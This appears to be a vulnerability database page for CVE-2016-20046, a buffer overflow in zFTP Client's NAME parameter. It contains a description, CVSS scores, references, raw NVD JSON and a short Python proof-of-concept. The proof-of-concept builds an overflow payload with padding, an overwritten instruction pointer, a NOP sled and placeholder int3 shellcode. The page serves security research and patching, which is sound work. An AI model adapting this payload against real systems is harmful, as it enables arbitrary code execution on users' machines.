CVE-2016-20046

Description

zFTP Client 20061220+dfsg3-4.1 contains a buffer overflow vulnerability in the NAME parameter handling of FTP connections that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized NAME value exceeding the 80-byte buffer allocated in strcpy_chk to overwrite the instruction pointer and execute shellcode with user privileges.

CVSS Details

CVSS Score

8.4

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

zFTP Client 20061220+dfsg3-4.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC for CVE-2016-20046: zFTP Client Buffer Overflow
# This script generates a malicious string to trigger the overflow.

def generate_payload():
    # Buffer size is 80 bytes. We need to overflow and overwrite EIP.
    # Fill the buffer (80 bytes)
    buffer = b'A' * 80
    # Overwrite EIP (4 bytes on x86) - Example address
    eip = b'\xbb\x11\x11\x11'
    # NOP sled + Shellcode (Example calc.exe)
    nop_sled = b'\x90' * 32
    shellcode = b'\xcc' * 50 # Int3 for testing crash
    
    payload = buffer + eip + nop_sled + shellcode
    return payload

if __name__ == "__main__":
    print("[+] Generating malicious payload for CVE-2016-20046...")
    payload = generate_payload()
    print(f"[+] Payload length: {len(payload)} bytes")
    print("[+] Payload (hex):", payload.hex())
    # Usage: Feed this payload into the NAME parameter of a FTP connection
    # handled by the vulnerable zFTP Client.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2016-20046
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2016-20046
[3] CVE Details https://www.cvedetails.com/cve/CVE-2016-20046/
[4] VulDB https://vuldb.com/cve/CVE-2016-20046
[5] http://cernlib.web.cern.ch/cernlib/
[6] https://www.exploit-db.com/exploits/40203
[7] https://www.vulncheck.com/advisories/zftp-client-20061220-dfsg3-local-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2016-20046", "sourceIdentifier": "[email protected]", "published": "2026-03-28T12:16:00.827", "lastModified": "2026-05-01T15:21:32.393", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "zFTP Client 20061220+dfsg3-4.1 contains a buffer overflow vulnerability in the NAME parameter handling of FTP connections that allows local attackers to crash the application or execute arbitrary code. Attackers can supply an oversized NAME value exceeding the 80-byte buffer allocated in strcpy_chk to overwrite the instruction pointer and execute shellcode with user privileges."}, {"lang": "es", "value": "zFTP Cliente 20061220+dfsg3-4.1 contiene una vulnerabilidad de desbordamiento de búfer en el manejo del parámetro NAME de las conexiones FTP que permite a atacantes locales bloquear la aplicación o ejecutar código arbitrario. Los atacantes pueden proporcionar un valor NAME sobredimensionado que excede el búfer de 80 bytes asignado en strcpy_chk para sobrescribir el puntero de instrucción y ejecutar shellcode con privilegios de usuario."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "references": [{"url": "http://cernlib.web.cern.ch/cernlib/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/40203", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/zftp-client-20061220-dfsg3-local-buffer-overflow", "source": "[email protected]"}]}}